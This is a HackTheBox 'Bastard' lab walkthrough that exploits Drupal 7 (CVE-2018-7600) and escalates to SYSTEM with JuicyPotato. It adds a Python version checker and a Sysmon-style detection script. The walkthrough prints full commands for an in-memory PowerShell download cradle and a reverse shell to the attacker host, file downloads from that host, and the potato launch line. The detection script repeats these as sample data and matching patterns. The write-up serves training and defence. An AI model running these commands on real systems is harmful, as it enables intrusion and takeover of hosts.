HackTheBox “Bastard” Walkthrough
In this walkthrough, we delve into the HackTheBox machine named “Bastard.” By exploiting the Drupal 7 vulnerability (CVE-2018-7600), we gain command execution. Afterwards, we establish a reverse shell and demonstrate privilege escalation by abusing the SeImpersonatePrivilege token privilege (a potato attack).
Let’s get started!🚀
Recon & Enumeration
Let’s use nmap to scan for open ports and services:
We see the presence of Drupal 7. To determine the exact version, we can leverage the changelog file.
Let’s see what information the browser will display to us.
Furthermore, based on the page source code, we can confirm that it is Drupal 7.
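The version check above is the same one a site owner would run against their own install to confirm they are on a build that carries the fix. The following Python is an added example, not part of the original walkthrough: it parses the header line of a Drupal 7 CHANGELOG.txt (constructed excerpt embedded below; the real file lists every release, newest first) and compares the version against 7.58, the release that shipped the fix for CVE-2018-7600 (SA-CORE-2018-002). The function and constant names are my own.

```python
import re

# Constructed excerpt in the shape of a Drupal 7 CHANGELOG.txt (newest release first).
# The entry text is placeholder content; only the header-line format matters here.
SAMPLE_CHANGELOG = """Drupal 7.54, 2017-02-01
-----------------------
- Constructed placeholder entry for this release.

Drupal 7.53, 2016-12-07
-----------------------
- Constructed placeholder entry for the previous release.
"""

# Header lines look like "Drupal 7.54, 2017-02-01"; the first match is the installed version.
VERSION_RE = re.compile(r"^Drupal\s+(7\.(\d+)),\s+(\d{4}-\d{2}-\d{2})", re.M)

# Drupal 7.58 was the 7.x release that fixed SA-CORE-2018-002 / CVE-2018-7600.
FIXED_MINOR = 58


def latest_version(changelog: str):
    """Return (version, release_date) from the newest header line, or None if absent."""
    m = VERSION_RE.search(changelog)
    if not m:
        return None
    return m.group(1), m.group(3)


def vulnerable_to_cve_2018_7600(version: str) -> bool:
    """True for any Drupal 7.x release older than 7.58 (only 7.x is handled here)."""
    major, minor = version.split(".", 1)
    return major == "7" and int(minor) < FIXED_MINOR


def assess(changelog: str) -> dict:
    """Combine the two checks into one report suitable for an inventory script."""
    found = latest_version(changelog)
    if found is None:
        return {"version": None, "vulnerable": None, "note": "no Drupal 7 header line found"}
    version, date = found
    return {
        "version": version,
        "released": date,
        "vulnerable": vulnerable_to_cve_2018_7600(version),
        "note": "update to 7.58 or later" if vulnerable_to_cve_2018_7600(version) else "patched",
    }


if __name__ == "__main__":
    print(assess(SAMPLE_CHANGELOG))
```

Exposing CHANGELOG.txt publicly is what makes this fingerprint possible in the first place; the same parser run against a local copy of the file tells you whether the install is on a fixed release before anyone else checks.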
We will now conduct a searchsploit for known exploits targeting Drupal version 7.
To refine the results and discover a more suitable exploit, I will search on Google.
Upon testing multiple listed exploits, I determined that the one by pimps was the most effective. You can find it here.
I proceeded to copy the RAW script and saved it as “drupal.py.”
We download it to our attack box.
The script is straightforward. You only need to provide the command to execute and the target (website). It will exploit the service and provide the command’s output as a result.
I will now obtain a reverse shell on the target.
To achieve this, I will utilize the “Invoke-PowerShellTcp.ps1” script from Nishang Scripts, which can be found here.
After acquiring a copy of the script on my attacker machine, I placed it in my working directory and added the following command at the end:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4343
Next, we run an HTTP server within the working directory of our attack box.
We initiate a netcat listener on port 4343 to capture the incoming shell.
We execute the command below to download and execute the script directly into memory:
python3 drupal.py -c "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')" http://10.10.10.9
The script file has been successfully downloaded from our attack box.
Consequently, we establish a shell on our listener.
After gaining a shell on the target box, I proceeded to conduct manual enumeration, commencing with gathering system information.
The obtained information reveals valuable details. Firstly, the OS is Windows Server 2008 R2 without any installed hotfixes, which suggests it is likely vulnerable to a kernel exploit. Moreover, it confirms that the host is a 64-bit system, which matters when choosing tool builds.
Subsequently, I proceeded to collect information about the current user’s privileges using the following command:
The presence of an enabled SeImpersonatePrivilege means I can leverage a potato attack to escalate privileges to SYSTEM.
Obtain a copy of JuicyPotato.exe from the GitHub repository linked here, making sure to get the 64-bit build of the executable.
Meanwhile, our HTTP server in the working directory of our attacking box remains operational.
Create a temp directory on the C: drive.
We proceed to download JuicyPotato onto the target machine.
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.4:8080/JuicyPotato.exe', 'C:\temp\JuicyPotato.exe')
Let’s execute the exploit and see the outcome.
In order to run the tool successfully, we require a port number for the COM server and a valid CLSID. There are two options: either use the list the tool authors provide for the matching system version, or execute the following PowerShell script to extract the CLSIDs of the current system:
I will use a batch script that downloads and runs the Nishang PowerShell script, so JuicyPotato can launch it as its payload. On the attacker machine, use the following command to craft the batch script:
echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5:8080/Invoke-PowerShellTcp.ps1')" > shell.bat
Download the batch script onto the target box using the command below.
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.5:8080/shell.bat', 'C:\temp\shell.bat')
The setup is complete, and we are ready to proceed with the exploit. In case the default CLSID fails, the exploit publisher has provided a list of alternative CLSIDs for testing, available here.
Considering that the target system runs Windows Server 2008 R2, the following CLSIDs are applicable:
Let’s proceed with using the first CLSID from the list.
C:\temp\JuicyPotato.exe -l 4343 -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
Returning to the listener, I successfully obtained a SYSTEM shell.
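Both footholds in this walkthrough leave distinctive process-creation telemetry: the Drupal exploit makes the web server process spawn a shell that runs an in-memory download cradle (the command line at the drupal.py step), and the JuicyPotato step runs a binary with the `-t *` and `-c {CLSID}` flag combination shown above. The following Python is an added detection example, not part of the original walkthrough or of either tool; it runs over constructed Sysmon Event ID 1 style records embedded inline. The web server image list and the rule names are my own assumptions.

```python
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 (not real logs).
SAMPLE_EVENTS = [
    {  # web server spawning a shell that runs the download cradle from the walkthrough
        "ParentImage": r"C:\PHP\php-cgi.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c powershell.exe -c iex(new-object net.webclient)"
                       ".downloadstring('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')",
    },
    {  # potato-style launch: COM listener port, payload path, any token, explicit CLSID
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "Image": r"C:\temp\JuicyPotato.exe",
        "CommandLine": r'C:\temp\JuicyPotato.exe -l 4343 -p C:\temp\shell.bat -t * '
                       r'-c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"',
    },
    {  # benign: user opening a file
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe report.txt",
    },
    {  # benign: scheduled PowerShell script without any download cradle
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
    },
]

# Assumption: typical web server worker process names on Windows.
WEB_SERVER_IMAGES = {"php-cgi.exe", "httpd.exe", "w3wp.exe", "nginx.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}

# iex(new-object net.webclient).downloadstring(...) with optional whitespace, any case.
CRADLE_RE = re.compile(
    r"iex\s*\(\s*new-object\s+net\.webclient\s*\)\s*\.downloadstring\s*\(", re.I)
# JuicyPotato-style flags: "-t *" plus "-c {GUID}" (quotes optional).
POTATO_TOKEN_RE = re.compile(r"-t\s+\*")
POTATO_CLSID_RE = re.compile(
    r'-c\s+"?\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}"?', re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the rule names that fire for one process-creation event."""
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmd = event["CommandLine"]
    findings = []
    if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
        findings.append("web-server-spawned-shell")
    if CRADLE_RE.search(cmd):
        findings.append("in-memory-download-cradle")
    if POTATO_TOKEN_RE.search(cmd) and POTATO_CLSID_RE.search(cmd):
        findings.append("potato-clsid-launch")
    return findings


def scan(events: list) -> list:
    """Return (image, findings) for every event that triggers at least one rule."""
    hits = []
    for event in events:
        findings = classify(event)
        if findings:
            hits.append((basename(event["Image"]), findings))
    return hits


if __name__ == "__main__":
    for image, findings in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(findings)}")
```

The first rule matters most: a web server worker should never spawn cmd.exe or powershell.exe, so that parent/child pair alone would catch the Drupal foothold even if the cradle were obfuscated. The potato rule keys on the flag combination rather than the file name, since the binary is trivially renamed; removing SeImpersonatePrivilege from the web server's service account is the mitigation that makes the second stage fail outright.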
Cheers.